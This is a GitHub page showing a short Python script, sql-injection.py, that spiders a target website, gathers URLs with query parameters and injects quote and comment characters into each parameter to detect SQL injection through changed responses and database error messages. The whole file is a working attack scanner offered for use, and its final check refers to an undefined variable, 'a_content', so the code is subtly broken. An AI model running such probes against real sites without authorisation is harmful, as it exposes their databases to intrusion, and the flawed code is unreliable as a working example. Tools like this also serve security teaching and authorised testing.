-
Notifications
You must be signed in to change notification settings - Fork 67
/
sql-injection.py
executable file
·151 lines (113 loc) · 3.59 KB
/
sql-injection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/python3
###[ Loading modules
import sys
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
###[ Global vars
max_urls = 999
inject_chars = ["'",
"--",
"/*",
'"']
error_msgs = [
"syntax error",
"sql error",
"failure",
]
known_url = {}
already_attacked = {}
attack_urls = []
###[ Subroutines
def get_abs_url(base_url, link):
"""
check if the link is relative and prepend the protocol
and host. filter unwanted links like mailto and links
that do not go to our base host
"""
if link:
if "://" not in link:
if link[0] != "/":
link = "/" + link
link = base_url.scheme + "://" + base_url.hostname + link
if "mailto:" in link or base_url.hostname not in link:
return None
else:
return link
def spider(base_url, url):
"""
check if we dont know the url
spider to url
extract new links
spider all new links recursively
"""
if len(known_url) >= max_urls:
return None
if url:
p_url = urlparse(url)
if not known_url.get(url) and p_url.hostname == base_url.hostname:
try:
sys.stdout.write(".")
sys.stdout.flush()
known_url[url] = True
r = requests.get(url)
if r.status_code == 200:
if "?" in url:
attack_urls.append(url)
soup = BeautifulSoup(r.content,
features="html.parser")
for tag in soup('a'):
spider(base_url, get_abs_url(base_url, tag.get('href')))
except requests.exceptions.ConnectionError as e:
print("Got error for " + url + \
": " + str(e))
def found_error(content):
"""
try to find error msg in html
"""
got_error = False
for msg in error_msgs:
if msg in content.lower():
got_error = True
return got_error
def attack(url):
"""
parse an urls parameter
inject special chars
try to guess if attack was successfull
"""
p_url = urlparse(url)
if not p_url.query in already_attacked.get(p_url.path, []):
already_attacked.setdefault(p_url.path, []).append(p_url.query)
try:
sys.stdout.write("\nAttack " + url)
sys.stdout.flush()
r = requests.get(url)
for param_value in p_url.query.split("&"):
param, value = param_value.split("=")
for inject in inject_chars:
a_url = p_url.scheme + "://" + \
p_url.hostname + p_url.path + \
"?" + param + "=" + inject
sys.stdout.write(".")
sys.stdout.flush()
a = requests.get(a_url)
if r.content != a.content:
print("\nGot different content " + \
"for " + a_url)
print("Checking for exception output")
if found_error(a_content):
print("Attack was successful!")
except requests.exceptions.ConnectionError:
pass
###[ MAIN PART
if len(sys.argv) < 2:
print(sys.argv[0] + ": <url>")
sys.exit(1)
start_url = sys.argv[1]
base_url = urlparse(start_url)
sys.stdout.write("Spidering")
spider(base_url, start_url)
sys.stdout.write(" Done.\n")
for url in attack_urls:
attack(url)